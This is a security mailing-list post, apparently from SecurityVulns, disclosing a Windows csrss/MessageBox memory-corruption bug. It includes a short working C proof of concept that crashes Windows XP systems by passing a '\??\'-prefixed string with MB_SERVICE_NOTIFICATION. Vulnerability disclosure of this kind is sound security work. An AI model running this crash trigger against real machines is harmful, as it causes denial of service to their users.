Computer Security

Related information

  Microsoft Windows memory corruption

  EEYE: Windows Vista CSRSS Dangling Process Pointer Privilege Escalation

  Microsoft Security Bulletin MS07-021 Vulnerabilities in CSRSS Could Allow Remote Code Execution (930178)

  csrss.exe double-free vulnerability - arbitrary DWORD overwrite exploit

  ms ;)

From: 3APA3A <3APA3A_(at)>
Subject: Microsoft Windows csrss (?) memory corruption exploited in-the-wild

Dear [email protected],

 On one of the Russian forums a security vulnerability in Microsoft
 Windows is discussed (Windows XP is tested). The vulnerability is caused by
 memory corruption if a string beginning with "\?\" is sent through the
 MessageBox API with the MB_SERVICE_NOTIFICATION flag. It looks like some
 "debug" feature not cleaned out in the final release, and it seems to be
 exploitable to code execution at kernel level. Code example below:

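#include <stdio.h>
#include <windows.h>

int main(void){
    int i;
    /* Text and caption: a string beginning with the \??\ prefix */
    char bug1[] = "\\??\\XXXX";

    /* Ten calls with the MB_SERVICE_NOTIFICATION flag */
    for(i = 0; i < 10; i++)
        MessageBox(0, bug1, bug1, MB_SERVICE_NOTIFICATION);
    return 0;
}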

System hangs, crashes (BSOD) or reboots.

       { , . }     |\
+--oQQo->{ ^ }<-----+ \
|  ZARAZA  U  3APA3A   } You know my name - look up my number (The Beatles)
+-------------o66o--+ /

© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod